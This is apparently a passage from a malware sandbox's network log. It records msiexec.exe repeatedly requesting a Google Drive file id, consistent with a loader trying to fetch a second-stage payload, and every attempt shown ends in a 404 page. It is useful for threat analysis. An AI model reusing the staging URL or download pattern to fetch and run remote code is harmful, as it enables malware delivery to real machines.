2025-01-11 02:09:21 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:21 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQXFlVnoPoSoaCZ-VhZH5PwAqIYy_lP7f_v20RhS_3274oaGNg7tTJuaKpjFFADm82ekGnkdB0 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:21 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-yC7SrjGQMhvCaO-BuhRaeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:21 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 69 30 56 35 39 51 7a 4f 34 5f 44 6b 6a 43 68 7a 48 53 79 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ai0V59QzO4_DkjChzHSy6w">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50014	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:22 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:22 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:22 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-aMEXnnuiSvOH1qt50BzZaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50015	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:23 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:23 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSuLBWxBTWhtvbIxAWEz9k7FZbtEm5xpnIgr5OiEYXUMVuEjAd-ebiuK0ZRb_JFPSPTzq_U_Wg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:23 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-qzHDhLanIGWPx8bo5cmBTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:23 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 67 33 39 70 4c 56 79 44 39 6f 4a 64 42 66 79 74 74 4f 68 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ig39pLVyD9oJdBfyttOhqw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50016	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:24 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:25 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:24 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-7FlYbOE-mpaY5FYxXoiysA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50017	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:25 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:26 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSzbweVsItyvRnOlAa8CiI5FknY2DRoQPYXDcfvQBgv4IASAsU1vtihTmM7GOieeP8w5CKujvg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:26 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-aEkAcqGmBg0qrqQl2A18bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:26 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 37 45 69 4c 52 4f 61 55 47 76 7a 46 66 61 41 56 42 69 67 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p7EiLROaUGvzFfaAVBigDw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50018	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:27 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:27 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:27 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-QoQPa0l7oxOigQetuOm6ZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50019	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:28 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:28 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgThZMaEJ6nhJpFG9cMRNKZxGdB6FPITtZVXbpkkfHD4Qjqjy4_Rfg7gJTTDAJW9dZiVpWhrgMs Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:28 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-6KV-VokfnN3gCHt0jhNRrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:28 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 45 34 2d 6b 34 49 52 42 61 75 6a 57 45 39 41 64 47 52 36 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0E4-k4IRBaujWE9AdGR6lQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50020	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:29 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:29 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:29 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-0aoPuYC7gt0qya7JMbB6Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50021	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
